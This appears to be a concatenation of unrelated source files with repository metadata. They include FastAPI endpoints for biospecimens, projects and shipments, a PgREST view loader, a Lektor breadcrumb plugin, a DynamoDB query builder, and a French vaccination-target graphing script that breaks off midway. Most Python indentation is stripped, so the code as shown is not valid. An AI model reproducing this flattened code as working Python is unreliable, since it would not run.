def get_comments_for_biospecimen(
biospecimen_id: str,
client: VBR_Api = Depends(vbr_admin_client),
):
"""Get Comments for a Biospecimen.
Requires: **VBR_READ_PUBLIC**"""
biospecimen_id = sanitize_identifier_string(biospecimen_id)
# TODO - change name of field to shipment_tracking_id after updating containers_public.sql
query = {"biospecimen_id": {"operator": "=", "value": biospecimen_id}}
rows = [
transform(c)
for c in client.vbr_client.query_view_rows(
view_name="biospecimens_comments_public",
query=query,
limit=0,
offset=0,
)
]
return rows
@router.post(
"/{biospecimen_id}/comments",
dependencies=[Depends(vbr_write_public)],
response_model=Comment,
)
def add_biospecimen_comment(
biospecimen_id: str,
body: CreateComment = Body(...),
client: VBR_Api = Depends(vbr_admin_client),
):
"""Add a Comment to a Biospecimen.
Requires: **VBR_WRITE_PUBLIC**"""
biospecimen_id = sanitize_identifier_string(biospecimen_id)
measurement = client.get_measurement_by_local_id(biospecimen_id)
data_event = client.create_and_link(comment=body.comment, link_target=measurement)[
0
]
return Comment(comment=data_event.comment, timestamp=data_event.event_ts)
# TODO
# POST /partition - partition a biospecimen into two
# GET /{biospecimen_id}/runlists
@router.get(
"/{biospecimen_id}/runlists",
dependencies=[Depends(vbr_read_public)],
response_model=List[RunListBase],
)
def get_runlists_for_biospecimen(
biospecimen_id: str,
client: VBR_Api = Depends(vbr_admin_client),
):
"""Get Runlists for a Biospecimen.
Requires: **VBR_READ_PUBLIC**"""
biospecimen_id = sanitize_identifier_string(biospecimen_id)
# TODO - change name of field to shipment_tracking_id after updating containers_public.sql
query = {"biospecimen_id": {"operator": "=", "value": biospecimen_id}}
rows = [
transform(c)
for c in client.vbr_client.query_view_rows(
view_name="runlists_biospecimens_public",
query=query,
limit=0,
offset=0,
)
]
return rows
```
#### File: application/routers/projects.py
```python
from typing import Dict
from fastapi import APIRouter, Body, Depends, HTTPException
from vbr.api import VBR_Api
from vbr.utils.barcode import generate_barcode_string, sanitize_identifier_string
from ..dependencies import *
from .models import Project, transform
from .utils import parameters_to_query
router = APIRouter(
prefix="/projects",
tags=["projects"],
responses={404: {"description": "Not found"}},
route_class=LoggingRoute,
)
@router.get("/", dependencies=[Depends(vbr_read_public)], response_model=List[Project])
def list_projects(
# See views/projects_public.sql for possible filter names
project_id: Optional[str] = None,
name: Optional[str] = None,
abbreviation: Optional[str] = None,
description: Optional[str] = None,
client: VBR_Api = Depends(vbr_admin_client),
common=Depends(limit_offset),
):
"""List Projects.
Refine results using filter parameters.
Requires: **VBR_READ_PUBLIC**"""
# TODO - build up from filters
query = parameters_to_query(
project_id=project_id,
name=name,
abbreviation=abbreviation,
description=description,
)
rows = [
transform(c)
for c in client.vbr_client.query_view_rows(
view_name="projects_public",
query=query,
limit=common["limit"],
offset=common["offset"],
)
]
return rows
@router.get(
"/{project_id}", dependencies=[Depends(vbr_read_public)], response_model=Project
)
def get_project_by_id(
project_id: str,
client: VBR_Api = Depends(vbr_admin_client),
):
"""Get a Project by ID.
Requires: **VBR_READ_PUBLIC**"""
query = {"project_id": {"operator": "eq", "value": project_id}}
row = transform(
client.vbr_client.query_view_rows(
view_name="projects_public", query=query, limit=1, offset=0
)[0]
)
return row
# TODO
# PUT /{project_id} - update project
# POST / - create new project
```
#### File: application/routers/shipments.py
```python
from typing import Dict
from fastapi import APIRouter, Body, Depends, HTTPException
from vbr.api import VBR_Api, tracking_id
from vbr.utils.barcode import generate_barcode_string, sanitize_identifier_string
from application.routers import container_types
from application.routers.models.actions.comment import Comment
from application.routers.models.actions.shipment import CreateShipment
from ..dependencies import *
from .models import (
AddContainer,
Container,
CreateComment,
Event,
SetShipmentStatus,
Shipment,
transform,
)
from .utils import parameters_to_query
router = APIRouter(
prefix="/shipments",
tags=["shipments"],
responses={404: {"description": "Not found"}},
route_class=LoggingRoute,
)
@router.get("/", dependencies=[Depends(vbr_read_public)], response_model=List[Shipment])
def list_shipments(
# See views/shipments_public.sql for possible filter names
shipment_id: Optional[str] = None,
tracking_id: Optional[str] = None,
shipment_name: Optional[str] = None,
sender_name: Optional[str] = None,
project_name: Optional[str] = None,
ship_from: Optional[str] = None,
ship_to: Optional[str] = None,
status: Optional[str] = None,
client: VBR_Api = Depends(vbr_admin_client),
common=Depends(limit_offset),
):
"""List Shipments.
Refine results using filter parameters.
Requires: **VBR_READ_PUBLIC**"""
query = parameters_to_query(
shipment_id=shipment_id,
tracking_id=tracking_id,
shipment_name=shipment_name,
sender_name=sender_name,
ship_from=ship_from,
ship_to=ship_to,
status=status,
)
rows = [
transform(c)
for c in client.vbr_client.query_view_rows(
view_name="shipments_public",
query=query,
limit=common["limit"],
offset=common["offset"],
)
]
return rows
@router.post("/", dependencies=[Depends(vbr_write_public)], response_model=Shipment)
def create_shipment(
body: CreateShipment = Body(...),
client: VBR_Api = Depends(vbr_admin_client),
):
"""Create a Shipment.
Requires: **VBR_WRITE_PUBLIC**"""
sender_name = body.sender_name
name = body.name
tracking_id = sanitize_identifier_string(body.tracking_id)
project_local_id = sanitize_identifier_string(body.project_id)
ship_to_local_id = sanitize_identifier_string(body.ship_to_location_id)
ship_from_local_id = sanitize_identifier_string(body.ship_from_location_id)
container_ids = [sanitize_identifier_string(c) for c in body.container_ids]
try:
project_id = client.get_project_by_local_id(project_local_id).project_id
except Exception:
raise HTTPException(
status_code=404,
detail="Could not find project {0}".format(project_local_id),
)
try:
ship_to_id = client.get_location_by_local_id(ship_to_local_id).location_id
except Exception:
raise HTTPException(
status_code=404,
detail="Could not find location {0}".format(ship_to_local_id),
)
try:
ship_from_id = client.get_location_by_local_id(ship_from_local_id).location_id
except Exception:
raise HTTPException(
status_code=404,
detail="Could not find location {0}".format(ship_from_local_id),
)
try:
containers = [client.get_container_by_local_id(c) for c in container_ids]
except Exception as exc:
raise HTTPException(
status_code=404,
detail="One or more container_ids could not be resolved: {0}".format(exc),
)
data = {
"name": name,
"sender_name": sender_name,
"tracking_id": tracking_id,
"project_id": project_id,
"ship_to_id": ship_to_id,
"ship_from_id": ship_from_id,
}
try:
shipment = client.create_shipment(**data)
        # If containers are provided, associate them with the Shipment
for container in containers:
try:
client.associate_container_with_shipment(container, shipment)
except Exception:
# TODO improve error handling
raise
# TODO Create EasyPost tracker
# Return created shipment
query = {"shipment_id": {"operator": "eq", "value": shipment.local_id}}
row = transform(
client.vbr_client.query_view_rows(
view_name="shipments_public", query=query, limit=1, offset=0
)[0]
)
return row
except Exception as exc:
raise
# raise HTTPException(status_code=500, detail=str(exc))
@router.get(
"/{shipment_id}", dependencies=[Depends(vbr_read_public)], response_model=Shipment
)
def get_shipment_by_id(
shipment_id: str,
client: VBR_Api = Depends(vbr_admin_client),
):
"""Get a Shipment by ID.
Requires: **VBR_READ_PUBLIC**"""
query = {"shipment_id": {"operator": "eq", "value": shipment_id}}
row = transform(
client.vbr_client.query_view_rows(
view_name="shipments_public", query=query, limit=1, offset=0
)[0]
)
return row
@router.get(
"/tracking/{tracking_id}",
dependencies=[Depends(vbr_read_public)],
response_model=Shipment,
)
def get_shipment_by_tracking_id(
tracking_id: str,
client: VBR_Api = Depends(vbr_admin_client),
):
"""Get a Shipment by parcel tracking ID.
Requires: **VBR_READ_PUBLIC**"""
tracking_id = sanitize_identifier_string(tracking_id)
query = {"tracking_id": {"operator": "eq", "value": tracking_id}}
row = transform(
client.vbr_client.query_view_rows(
view_name="shipments_public", query=query, limit=1, offset=0
)[0]
)
return row
# GET /tracking/{tracking_id}/containers
@router.get(
"/tracking/{tracking_id}/containers",
dependencies=[Depends(vbr_read_public)],
response_model=List[Container],
)
def get_containers_in_shipment(
tracking_id: str,
client: VBR_Api = Depends(vbr_admin_client),
):
"""Get Containers in a Shipment.
Requires: **VBR_READ_PUBLIC**"""
tracking_id = sanitize_identifier_string(tracking_id)
# TODO - change name of field to shipment_tracking_id after updating containers_public.sql
query = {"tracking_id": {"operator": "=", "value": tracking_id}}
rows = [
transform(c)
for c in client.vbr_client.query_view_rows(
view_name="containers_public",
query=query,
limit=0,
offset=0,
)
]
return rows
# PUT /tracking/{tracking_id}/containers - add a container to a shipment
@router.put(
"/tracking/{tracking_id}/container",
dependencies=[Depends(vbr_write_public)],
response_model=List[Container],
)
def add_container_to_shipment(
tracking_id: str,
body: AddContainer = Body(...),
    client: VBR_Api = Depends(vbr_admin_client),
):
"""Add a Container to a Shipment.
Requires: **VBR_WRITE_PUBLIC**"""
tracking_id = sanitize_identifier_string(tracking_id)
container_id = sanitize_identifier_string(body.container_id)
try:
shipment = client.get_shipment_by_tracking_id(tracking_id)
except Exception:
raise HTTPException(
status_code=404, detail="Shipment {0} not found".format(tracking_id)
)
try:
container = client.get_container_by_local_id(container_id)
except Exception:
raise HTTPException(
status_code=404, detail="Container {0} not found".format(container_id)
)
try:
location = client.get_location(shipment.ship_from)
except Exception:
raise HTTPException(
status_code=404, detail="Location {0} not found".format(shipment.ship_from)
)
try:
client.associate_container_with_shipment(container, shipment)
except Exception:
raise HTTPException(
status_code=500, detail="Failed to associate container with shipment"
)
try:
client.relocate_container(container, location, sync=False)
except Exception:
raise HTTPException(
status_code=500, detail="Failed to update container location"
)
# Display updated list of containers associated with shipment
query = {"tracking_id": {"operator": "=", "value": tracking_id}}
rows = [
transform(c)
for c in client.vbr_client.query_view_rows(
view_name="containers_public",
query=query,
limit=0,
offset=0,
)
]
return rows
# DELETE /tracking/{tracking_id}/containers/{container_id} - remove a container from a shipment
@router.delete(
"/tracking/{tracking_id}/container/{container_id}",
dependencies=[Depends(vbr_write_public)],
response_model=List[Container],
)
def remove_container_from_shipment(
tracking_id: str,
container_id: str,
    client: VBR_Api = Depends(vbr_admin_client),
):
"""Remove a Container from a Shipment.
Requires: **VBR_WRITE_PUBLIC**"""
tracking_id = sanitize_identifier_string(tracking_id)
container_id = sanitize_identifier_string(container_id)
container = client.get_container_by_local_id(container_id)
client.disassociate_container_from_shipment(container)
# Display updated list of containers associated with shipment
query = {"tracking_id": {"operator": "=", "value": tracking_id}}
rows = [
transform(c)
for c in client.vbr_client.query_view_rows(
view_name="containers_public",
query=query,
limit=0,
offset=0,
)
]
return rows
# PATCH /tracking/{tracking_id}/status - update status by name
@router.patch(
"/tracking/{tracking_id}/status",
dependencies=[Depends(vbr_write_public)],
response_model=Shipment,
)
def update_shipment_status(
tracking_id: str,
body: SetShipmentStatus = Body(...),
    client: VBR_Api = Depends(vbr_admin_client),
):
"""Update a Shipment status
Setting `relocate_containers=true` in the message body
when event name is `received` will move all containers
associated with the shipment to the shipment destination.
Requires: **VBR_WRITE_PUBLIC**"""
tracking_id = sanitize_identifier_string(tracking_id)
shipment = client.get_shipment_by_tracking_id(tracking_id)
shipment = client.update_shipment_status_by_name(
shipment, status_name=body.status.value, comment=body.comment
)
# TODO - take any requisite actions associated with specific statuses
if body.status.value == "received" and body.relocate_containers is True:
to_location = client.get_location(shipment.ship_to)
containers = client.get_containers_for_shipment(shipment)
for container in containers:
client.relocate_container(container, to_location, sync=False)
query = {"shipment_id": {"operator": "eq", "value": shipment.local_id}}
row = transform(
client.vbr_client.query_view_rows(
view_name="shipments_public", query=query, limit=1, offset=0
)[0]
)
return row
# GET /tracking/{tracking_id}/events
@router.get(
"/tracking/{tracking_id}/events",
dependencies=[Depends(vbr_read_public)],
response_model=List[Event],
)
def get_events_for_shipment(
tracking_id: str,
client: VBR_Api = Depends(vbr_admin_client),
):
"""Get Events for a Shipment.
Requires: **VBR_READ_PUBLIC**"""
tracking_id = sanitize_identifier_string(tracking_id)
# TODO - change name of field to shipment_tracking_id after updating containers_public.sql
query = {"shipment_tracking_id": {"operator": "=", "value": tracking_id}}
rows = [
transform(c)
for c in client.vbr_client.query_view_rows(
view_name="shipments_data_events_public",
query=query,
limit=0,
offset=0,
)
]
return rows
# GET /tracking/{tracking_id}/comments
@router.get(
"/tracking/{tracking_id}/comments",
dependencies=[Depends(vbr_read_public)],
response_model=List[Comment],
)
def get_comments_for_shipment(
tracking_id: str,
client: VBR_Api = Depends(vbr_admin_client),
):
"""Get Comments for a Shipment.
Requires: **VBR_READ_PUBLIC**"""
tracking_id = sanitize_identifier_string(tracking_id)
# TODO - change name of field to shipment_tracking_id after updating containers_public.sql
query = {"shipment_tracking_id": {"operator": "=", "value": tracking_id}}
rows = [
transform(c)
for c in client.vbr_client.query_view_rows(
view_name="shipments_comments_public",
query=query,
limit=0,
offset=0,
)
]
return rows
@router.post(
"/tracking/{tracking_id}/comments",
dependencies=[Depends(vbr_write_public)],
response_model=Comment,
)
def add_shipment_comment(
tracking_id: str,
body: CreateComment = Body(...),
client: VBR_Api = Depends(vbr_admin_client),
):
"""Add a Comment to a Shipment.
Requires: **VBR_WRITE_PUBLIC**"""
tracking_id = sanitize_identifier_string(tracking_id)
shipment = client.get_shipment_by_tracking_id(tracking_id)
data_event = client.create_and_link(comment=body.comment, link_target=shipment)[0]
return Comment(comment=data_event.comment, timestamp=data_event.event_ts)
# TODO
# POST / - create new shipment
```
#### File: vbr-app/application/version.py
```python
import os
__all__ = ["get_version"]
API_VERSION = "0.3.1"
def get_version():
# This is optionally provided by the hosting container
BUILD_VERSION = os.environ.get("BUILD_VERSION", None)
if BUILD_VERSION is not None and BUILD_VERSION != "":
return "{0}-{1}".format(API_VERSION, BUILD_VERSION)
else:
return API_VERSION
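# Illustrative sketch: with BUILD_VERSION="42" set in the environment,
# get_version() returns "0.3.1-42"; with it unset or empty, it returns "0.3.1".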
```
#### File: vbr-app/scripts/create_views.py
```python
import argparse
import os
import re
import sys
# import sqlfluff
from tapipy.tapis import Tapis
from vbr.client.connection import TapisDirectClient
VIEWS_PATH = "./views"
def delete_view(view_name: str, client: Tapis):
views = client.pgrest.list_views()
for view in views:
if view.view_name == view_name or view.root_url == view_name:
client.pgrest.delete_view(view_name=view.manage_view_id)
def load_sql(filename: str, tenant_id: str, replace: bool = False) -> str:
with open(filename) as f:
sql = f.read()
sql = sql.strip()
sql = re.sub(r"\s+", " ", sql)
return sql
def construct_view(filename: str, raw_sql: str, comments: str = None) -> dict:
view_name = os.path.basename(filename)
view_name = re.sub(r".sql$", "", view_name)
# TODO - extract first line comment -- formatted as /* comment goes here */
    # Transform SQL into the "AS ...;" form that PgREST expects
if not raw_sql.endswith(";"):
raw_sql = raw_sql + ";"
if not raw_sql.startswith("AS "):
raw_sql = "AS " + raw_sql
return {"view_name": view_name, "raw_sql": raw_sql, "comments": comments}
def main(arg_vals):
t = Tapis(
base_url=arg_vals["base_url"],
username=arg_vals["username"],
password=arg_vals["password"],
)
t.get_tokens()
tenant_id = t.tenant_id
client = TapisDirectClient(t)
client.setup("pgrest", api_path="manage/views")
view_sql_files = [f for f in os.listdir(VIEWS_PATH) if not f.startswith(".")]
base_views = []
child_views = []
for view_file in view_sql_files:
if arg_vals["view_names"] != []:
if view_file not in arg_vals["view_names"] or not view_file.endswith(
".sql"
):
continue
raw_sql = load_sql(os.path.join(VIEWS_PATH, view_file), tenant_id, False)
data = construct_view(view_file, raw_sql)
if "base" in data["view_name"]:
base_views.append(data)
else:
child_views.append(data)
print(len(base_views), "base views found")
print(len(child_views), "child views found")
# Create views
# TODO - Check for existence and delete
for view in base_views:
try:
# try:
# client.setup("pgrest", api_path="manage/views/" + view["view_name"])
# resp = client.delete()
# print("Deleted {0}".format(view["view_name"]))
# client.setup("pgrest", api_path="manage/views")
# except Exception as exc:
# # TODO - better error checking and reporting
# print(exc)
resp = client.post(data=view)
print("Created " + view["view_name"])
except Exception as exc:
print(exc)
for view in child_views:
try:
resp = client.post(data=view)
print("Created " + view["view_name"])
except Exception as exc:
print(exc)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"-H",
type=str,
default=os.environ.get("TAPIS_BASE_URL"),
dest="base_url",
help="Tapis API Base URL",
)
parser.add_argument(
"-U",
type=str,
dest="username",
default=os.environ.get("TAPIS_USERNAME"),
help="Tapis Username",
)
parser.add_argument(
"-P",
type=str,
dest="password",
default=os.environ.get("TAPIS_PASSWORD"),
help="Tapis Password",
)
parser.add_argument("view_names", nargs="*", help="Optional view name(s)")
args = parser.parse_args()
main(vars(args))
``` |
{
"source": "a2csuga/lektor-root-relative-path",
"score": 2
} |
#### File: a2csuga/lektor-root-relative-path/lektor_root_relative_path.py
```python
try:
# py3
from urllib.parse import urljoin, quote
except ImportError:
# py2
from urlparse import urljoin
from urllib import quote
from lektor.pluginsystem import Plugin
from furl import furl
class RootRelativePathPlugin(Plugin):
name = u'root-relative-path'
description = u'Returns root relative path list as tuple like \
[(toppage_url, toppage_name), ...(parent_url, parent_name), (url, name)]'
def on_setup_env(self, **extra):
navi_top_page_name = self.get_config().get('navi_top_page_name') or 'Top Page'
def root_relative_path_list(current_url):
url = '/'
name = navi_top_page_name
path_list = [(url, name)]
            # furl('/blog').path.segments returns ['/blog']
            # But furl('/').path.segments returns ['']
            # instead of []. So return the value here before entering the loop
if current_url == '/':
return path_list
for i in furl(current_url).path.segments:
url = quote(urljoin(url, '%s' % i))
name = i
path_list.append((url, name))
url = url + '/'
return path_list
self.env.jinja_env.filters['root_relative_path_list'] = root_relative_path_list
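# Illustrative sketch (hypothetical URL, default config): applying the filter
# in a template as {{ this.url_path | root_relative_path_list }} to
# '/blog/2021' yields
#   [('/', 'Top Page'), ('/blog', 'blog'), ('/blog/2021', '2021')]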
``` |
{
"source": "a2d24/botoful",
"score": 2
} |
#### File: botoful/botoful/query.py
```python
from __future__ import annotations
import copy
import numbers
from functools import wraps, reduce
from typing import List, Set, Union
from .filters import build_filter, Filter, ConditionBase
from .reserved import RESERVED_KEYWORDS
from .serializers import deserialize, serialize
def fluent(func):
# Decorator that assists in a fluent api.
# It clones the current 'self', calls the wrapped method on the clone and returns the clone
@wraps(func)
def fluent_wrapper(self, *args, **kwargs):
new_self = copy.deepcopy(self)
return func(new_self, *args, **kwargs)
return fluent_wrapper
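# Illustrative sketch: because @fluent deep-copies self before applying the
# wrapped method, chained calls never mutate the original query object:
#   base = Query(table="t")   # hypothetical table name
#   q = base.index("gsi1")    # base is unchanged; q is a new Query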
class QueryResult:
def __init__(self, items=None, next_token=None, model=None):
if items is None:
items = []
self.items = [model(**item) for item in items] if model else items
self.count = len(items)
self.next_token = next_token
self._model = model
class Condition:
def __init__(self, key, operator, value):
self.key = key
self.operator = operator
self.value = value
def as_key_condition_expression(self):
if self.operator == '=':
return f"{self.key} = :{self.raw_key}"
elif self.operator == 'begins_with':
return f"begins_with ({self.key}, :{self.raw_key})"
elif self.operator == 'gte':
return f"{self.key} >= :{self.raw_key}"
elif self.operator == 'lte':
return f"{self.key} <= :{self.raw_key}"
elif self.operator == 'gt':
return f"{self.key} > :{self.raw_key}"
elif self.operator == 'lt':
return f"{self.key} < :{self.raw_key}"
elif self.operator == 'between':
return f"{self.key} BETWEEN :{self.raw_key}_lower AND :{self.raw_key}_upper"
raise NotImplementedError(f"Operator {self.operator} is currently not supported")
def as_expression_attribute_values(self, params):
if self.operator == 'between':
lower = self.value[0].format(**params) if isinstance(self.value[0], str) else self.value[0]
            upper = self.value[1].format(**params) if isinstance(self.value[1], str) else self.value[1]
return {
f":{self.raw_key}_lower": serialize(lower),
f":{self.raw_key}_upper": serialize(upper),
}
_key = f":{self.raw_key}"
if isinstance(self.value, str):
return {_key: serialize(self.value.format(**params))}
if isinstance(self.value, numbers.Number):
return {_key: serialize(self.value)}
@property
def raw_key(self):
return f"{self.key[1:]}" if self.key.startswith('#') else self.key
class Query:
def __init__(self, table=None):
self.table = table
self._max_items = None
self._index = None
self._key_conditions: List[Condition] = []
self._named_variables: Set[str] = set()
self._attributes_to_fetch: Set[str] = set()
self._filter: Union[Filter, None] = None
self._page_size = None
self._consistent_read = False
self._scan_index_forward = True
@fluent
def page_size(self, page_size) -> Query:
self._page_size = page_size
return self
def limit(self, limit) -> Query:
return self.page_size(page_size=limit)
@fluent
def index(self, index_name: str) -> Query:
self._index = index_name
return self
@fluent
def key(self, **kwargs) -> Query:
for key, condition in kwargs.items():
if len(self._key_conditions) >= 2:
raise ValueError("The key method can take a maximum of two keyword arguments")
tokens = key.split('__') if '__' in key else (key, '=')
key = self._name_variable(tokens[0])
operator = tokens[1]
self._key_conditions.append(Condition(key=key, operator=operator, value=condition))
return self
@fluent
def attributes(self, keys: List[str]):
self._attributes_to_fetch.update(keys)
return self
@fluent
def filter(self, condition: ConditionBase):
self._filter = condition
return self
@fluent
def consistent(self, consistent_read: bool=True):
self._consistent_read = consistent_read
return self
@fluent
def forwards(self):
self._scan_index_forward = True
return self
@fluent
def backwards(self):
self._scan_index_forward = False
return self
def _name_variable(self, variable):
if variable.upper() not in RESERVED_KEYWORDS:
return variable
self._named_variables.add(variable)
return f"#{variable}"
def build(self, params, starting_token=None):
result = {}
expression_attribute_names = {}
expression_attribute_values = {}
if self.table:
result['TableName'] = self.table
if self._page_size:
result['PaginationConfig'] = dict(
MaxItems=self._page_size,
PageSize=self._page_size,
StartingToken=starting_token
)
if self._index:
result['IndexName'] = self._index
if self._key_conditions:
result['KeyConditionExpression'] = " AND ".join(
(c.as_key_condition_expression() for c in self._key_conditions)
)
expression_attribute_values.update(
reduce(lambda a, b: {**a, **b},
[
c.as_expression_attribute_values(params=params) for c in self._key_conditions
]))
else:
raise RuntimeError("No key conditions specified for query. A query requires at least one key condition")
if self._named_variables:
expression_attribute_names.update({f"#{var}": var for var in self._named_variables})
# Build ProjectionExpression
if self._attributes_to_fetch:
result['ProjectionExpression'] = ', '.join(
[f"#{attr}" if attr.upper() in RESERVED_KEYWORDS else attr for attr in self._attributes_to_fetch]
)
reserved_keywords_attributes = list(
filter(lambda item: item.upper() in RESERVED_KEYWORDS, self._attributes_to_fetch))
if reserved_keywords_attributes:
expression_attribute_names.update({f"#{attr}": attr for attr in reserved_keywords_attributes})
if self._filter:
filter_to_apply = build_filter(self._filter)
expression_attribute_names.update(filter_to_apply.name_placeholders)
expression_attribute_values.update(filter_to_apply.value_placeholders)
result['FilterExpression'] = filter_to_apply.expression
if self._consistent_read:
result['ConsistentRead'] = self._consistent_read
# Default for ScanIndexForward is True, so set only if this value is False
if not self._scan_index_forward:
result['ScanIndexForward'] = self._scan_index_forward
if expression_attribute_names:
result['ExpressionAttributeNames'] = expression_attribute_names
if expression_attribute_values:
result['ExpressionAttributeValues'] = expression_attribute_values
return result
def preview(self, params=None, starting_token=None):
if params is None:
params = {}
import json
print(json.dumps(self.build(params=params, starting_token=starting_token), indent=2))
def execute(self, client, starting_token=None, model=None, params=None) -> QueryResult:
if params is None:
params = {}
if not self.table:
raise RuntimeError("Queries cannot be executed without a table name specified")
paginator = client.get_paginator('query')
query = self.build(params=params, starting_token=starting_token)
response = paginator.paginate(**query).build_full_result()
items = [deserialize(item) for item in response.get('Items')]
next_token = response.get('NextToken')
return QueryResult(items=items, next_token=next_token, model=model)
def execute_paginated(self, starting_token=None, *args, **kwargs) -> QueryResult:
while True:
result = self.execute(*args, **kwargs, starting_token=starting_token)
yield result
starting_token = result.next_token
if starting_token is None:
break
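# Example usage (a minimal sketch; assumes a boto3 DynamoDB client and a
# hypothetical "events" table keyed on "pk" and "sk"):
#   import boto3
#   client = boto3.client("dynamodb")
#   result = (Query(table="events")
#             .key(pk="user#{user_id}", sk__begins_with="order#")
#             .attributes(["pk", "sk", "total"])
#             .backwards()
#             .page_size(25)
#             .execute(client, params={"user_id": "123"}))
#   for item in result.items:
#       print(item)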
``` |
{
"source": "A2drien/VaccineGraph",
"score": 2
} |
#### File: VaccineGraph/Archives Objectifs Gouvernement/scriptObjectifGouvernement.py
```python
from urllib import request
import urllib.request
from operator import itemgetter
from datetime import datetime, timedelta
import matplotlib.pyplot as plt
import numpy as np
import os
#Graph parameters
limite_date_debut = "2020-12-29" #First date kept in the data (0 to keep the full list)
limite_date_fin = "2021-08-31" #Exclude data from this date onwards (0 to keep the full list)
limite_nombre_jour = 0 #Number of dates written on the x-axis (0 or 1 keeps the full list)
limite_ecart_jour = 7 #Space dates n days apart (1 to keep the full list)
nb_jour_prediction = 7 #Project the following days from the last n days
y_min = 0 #Minimum percentage displayed
y_max = 100 #Maximum percentage displayed
#List of government targets
obj_1_dose = 50000000 #50,000,000 people with a first dose
obj_tot_dose = 40000000 #40,000,000 fully vaccinated people
obj_50_ans_1_dose = 0.85 #85% of people aged 50+ with a first dose
obj_18_ans_1_dose = 0.75 #75% of people aged 18+ with a first dose
obj_18_ans_tot_dose = 0.66 #66% of people aged 18+ fully vaccinated
#Population data (Insee, 2021) (https://www.insee.fr/fr/outil-interactif/5367857/details/20_DEM/21_POP/21C_Figure3#)
pop_50_ans = 27824662 #27,824,662 French residents are over 50
pop_18_ans = 53761464 #53,761,464 French residents are over 18
#Data file parameters
lieu_telechargement = "Archives Données/"
#Uniformly reduces a list down to limite_nombre_jour elements
def reduction(liste):
    if limite_nombre_jour == 0 or limite_nombre_jour == 1: return liste #limite_nombre_jour must not equal 0 or 1 here (risk of error)
    liste_compressee = []
    coeff = len(liste)/(limite_nombre_jour-1) #Ideal spacing between 2 elements of the list to compress
    liste_compressee.append(liste[0]) #Add the first element of the list to compress
    for i in range(len(liste)):
        if int(i/coeff) == len(liste_compressee): #If the element's position reaches its position in the compressed list
            liste_compressee.append(liste[i-1]) #Then add the element to the compressed list
    liste_compressee.append(liste[-1]) #Add the last element to the compressed list
    return liste_compressee
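#Illustrative sketch (hypothetical values): with limite_nombre_jour = 5,
#reduction(list(range(10))) returns [0, 2, 4, 7, 9], keeping both endpoints
#and roughly evenly spaced elements in between.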
#Used to project the curves forwards
def projectionObjectif(liste):
    coeff = (liste[-1]-liste[-1-nb_jour_prediction])/nb_jour_prediction #Curve trend computed from the last 7 days
    while len(liste_dates) != len(liste): liste.append(liste[-1]+coeff) #Keep projecting until the projection reaches the end date
    return liste
#Spaces dates out according to limite_ecart_jour
def ecartDate(liste):
new_liste = []
for i in range(len(liste)):
if i % limite_ecart_jour == 0: new_liste.append(liste[i])
return new_liste
def formatNombre(nombre):
nombre = str(nombre)
j = 0
for i in range(1,len(nombre)):
if i%3 == 0:
nombre = nombre[:-i-j] + " " + nombre[-i-j:]
j += 1
return nombre
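#Illustrative sketch: formatNombre(1234567) returns "1 234 567"
#(a space inserted every three digits, counting from the right).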
#Temporarily save the data file
lignes = str(urllib.request.urlopen("https://www.data.gouv.fr/fr/datasets/donnees-relatives-aux-personnes-vaccinees-contre-la-covid-19-1/").read()).strip("b'").split("\\n")
fichier = open("fichier_temporaire.html", "w")
for ligne in lignes:
if "vacsi-a-fra-" in ligne and "vacsi-a-fra-YYYY-MM-DD-HHhmm.csv" not in ligne:
for i in range(len(ligne)-32):
nom_fichier = ligne[i:i+12]
if nom_fichier == "vacsi-a-fra-":
nom_fichier = ligne[i:i+32]
break
fichier.close()
if not os.path.exists(lieu_telechargement+nom_fichier):
lignes = str(request.urlopen("https://www.data.gouv.fr/fr/datasets/r/54dd5f8d-1e2e-4ccb-8fb8-eac68245befd").read()).strip("b'").split("\\n")
fichier = open(lieu_telechargement+nom_fichier, "w")
for ligne in lignes: fichier.write(ligne + "\n")
fichier.close()
#Start of the script
fichier = open(lieu_telechargement+nom_fichier, "r") #Open the file
ligne_descripteurs = fichier.readline().rstrip().rsplit(";") #Split the first line (column headers) from the numeric values
lignes = fichier.readlines() #The rest is stored in "lignes"
table = []
empecher_valeurs_previsionnelles = False #By default, do not block plotting of projected values
limite_date_debut_existe = False #By default, do not drop dates without checking that the start limit exists
for ligne in lignes:
ligne = ligne.rstrip().split(";")
if ligne[0] == "": break
    del ligne[0] #Remove the injection country column (every row in the file is for France)
    ligne[0] = int(ligne[0]) #Convert recipients' age to an integer (a string by default)
    del ligne[2] #Remove daily first injections
    del ligne[2] #Remove daily complete injections
    ligne[2] = int(ligne[2]) #Convert cumulative first injections to an integer
    ligne[3] = int(ligne[3]) #Convert cumulative complete injections to an integer
    ligne[4] = float(ligne[4]) #Convert the first-dose rate to a float
    ligne[5] = float(ligne[5]) #Convert the fully-vaccinated rate to a float
    table.append(ligne)
    if ligne[1] == limite_date_debut: limite_date_debut_existe = True #Only trim dates if the start limit exists in the file
fichier.close() #Close the file
table = sorted(table, key=itemgetter(1, 0)) #Sort the data by date, then by age
#While the start date limit is not reached, and if it exists, keep dropping data
while limite_date_debut_existe and table[0][1] != limite_date_debut: del table[0]
#Check for data later than the end date limit
for i in range(len(table)):
    if table[i][1] == limite_date_fin: #If there is any...
        del table[i+15:] #Drop that data
        empecher_valeurs_previsionnelles = True #Skip marking projected values (not needed)
        break #Break the loop to avoid further errors
#Initialize the date variable and the 7 other curves
liste_dates = [] #Holds the list of dates on the x-axis
primo_injections_18_ans = [] #Holds the number of first injections for people 18+
primo_injections_50_ans = [] #Holds the number of first injections for people 50+
primo_injections_totales = [] #Holds the total number of first injections
injections_completes_18_ans = [] #Holds the number of complete injections for people 18+
injections_completes_totales = [] #Holds the total number of complete injections
proportion_primo_vaccines = [] #Holds the share of first-dose recipients
proportion_vaccines = [] #Holds the share of fully vaccinated people
#Running totals carried across the age groups
cumul_primo_injections_18_ans = 0
cumul_injections_completes_18_ans = 0
cumul_primo_injections_50_ans = 0
#Distribute the data across the lists
for donnees in table:
    #To make the code easier to follow, the 6 columns are assigned to variables
age = donnees[0]
date = donnees[1]
primo_injections = donnees[2]
injections_completes = donnees[3]
taux_primo_vaccines = donnees[4]
taux_vaccines = donnees[5]
#Dans le cas où la ligne concerne les injections tout âge confondu...
if age == 0:
primo_injections_totales.append(primo_injections/obj_1_dose*100)
injections_completes_totales.append(injections_completes/obj_tot_dose*100)
liste_dates.append(date)
proportion_primo_vaccines.append(taux_primo_vaccines)
proportion_vaccines.append(taux_vaccines)
    #If the row covers injections for people aged 18 to 49...
elif 18 <= age <= 49:
cumul_primo_injections_18_ans += primo_injections
